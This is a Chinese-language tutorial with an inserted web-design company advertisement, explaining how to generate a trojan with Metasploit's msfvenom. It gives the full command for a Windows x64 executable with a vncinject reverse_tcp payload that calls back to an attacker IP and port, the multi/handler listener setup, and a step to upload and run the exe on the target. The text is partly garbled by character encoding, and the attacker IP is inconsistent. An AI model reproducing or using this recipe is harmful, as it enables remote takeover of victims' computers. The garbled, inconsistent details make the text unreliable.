Metasploit中木馬生成的原理是什么,很多新手對(duì)此不是很清楚,為了幫助大家解決這個(gè)難題,下面小編將為大家詳細(xì)講解,有這方面需求的人可以來學(xué)習(xí)下,希望你能有所收獲。
創(chuàng)新互聯(lián)專注為客戶提供全方位的互聯(lián)網(wǎng)綜合服務(wù),包含不限于成都網(wǎng)站設(shè)計(jì)、做網(wǎng)站、宕昌網(wǎng)絡(luò)推廣、成都小程序開發(fā)、宕昌網(wǎng)絡(luò)營銷、宕昌企業(yè)策劃、宕昌品牌公關(guān)、搜索引擎seo、人物專訪、企業(yè)宣傳片、企業(yè)代運(yùn)營等,從售前售中售后,我們都將竭誠為您服務(wù),您的肯定,是我們最大的嘉獎(jiǎng);創(chuàng)新互聯(lián)為所有大學(xué)生創(chuàng)業(yè)者提供宕昌建站搭建服務(wù),24小時(shí)服務(wù)熱線:028-86922220,官方網(wǎng)址:www.cdcxhl.com
一、生成方式:利用msf模塊中的msfvenom模塊
二、原理:msfvenom是msfpayload、msfencode的結(jié)合體,利用msfvenom生成木馬程序,并在目標(biāo)機(jī)上執(zhí)行,在本地監(jiān)聽上線
三、msfvenom命令行選項(xiàng)如下
-p, --payload
-l, --list [module_type] 列出指定模塊的所有可用資源. 模塊類型包括: payloads, encoders, nops, all
-n, --nopsled
-f, --format
-e, --encoder [encoder] 指定需要使用的encoder(編碼器)
-a, --arch
--platform
-s, --space
-b, --bad-chars 設(shè)定規(guī)避字符集,比如: '\x00\xff'
-i, --iterations
-c, --add-code
-x, --template
-k, --keep 保護(hù)模板程序的動(dòng)作,注入的payload作為一個(gè)新的進(jìn)程運(yùn)行
--payload-options 列舉payload的標(biāo)準(zhǔn)選項(xiàng)
-o, --out
-v, --var-name
--shellest 最小化生成payload
-h, --help 查看幫助選項(xiàng)
--help-formats 查看msf支持的輸出格式列表
四、使用方法
1、msfvenom --list platforms 顯示支持的平臺(tái)
2、msfvenom --list formats 顯示支持的格式
3、msfvenom --list archs 顯示支持的架構(gòu)
4、msfvenom --list encoders 顯示支持的編碼器
5、生成木馬
目標(biāo)主機(jī):192.168.1.129(win7 x64)
攻擊機(jī):192.168.1.33
攻擊端口:12121
生成木馬:msfvenom --arch x64 --platform windows -p windows/x64/vncinject/reverse_tcp lhost=192.168.1.133 lport=12121 -f exe -o /root/win64.exe
6、進(jìn)入監(jiān)聽模塊 use exploit/multi/handler
7、設(shè)置payload反彈 set payload windows/x64/vncinject/reverse_tcp
8、查看需要設(shè)置的參數(shù):show options
9、設(shè)置攻擊機(jī)ip:set lhost 192.168.1.133
10、設(shè)置攻擊端口:set lport 12121
11、將生成的exe文件上傳到目標(biāo)主機(jī)并運(yùn)行
12、run攻擊
13、攻擊機(jī)的監(jiān)控畫面
14、目標(biāo)主機(jī)畫面
看完上述內(nèi)容是否對(duì)您有幫助呢?如果還想對(duì)相關(guān)知識(shí)有進(jìn)一步的了解或閱讀更多相關(guān)文章,請(qǐng)關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道,感謝您對(duì)創(chuàng)新互聯(lián)的支持。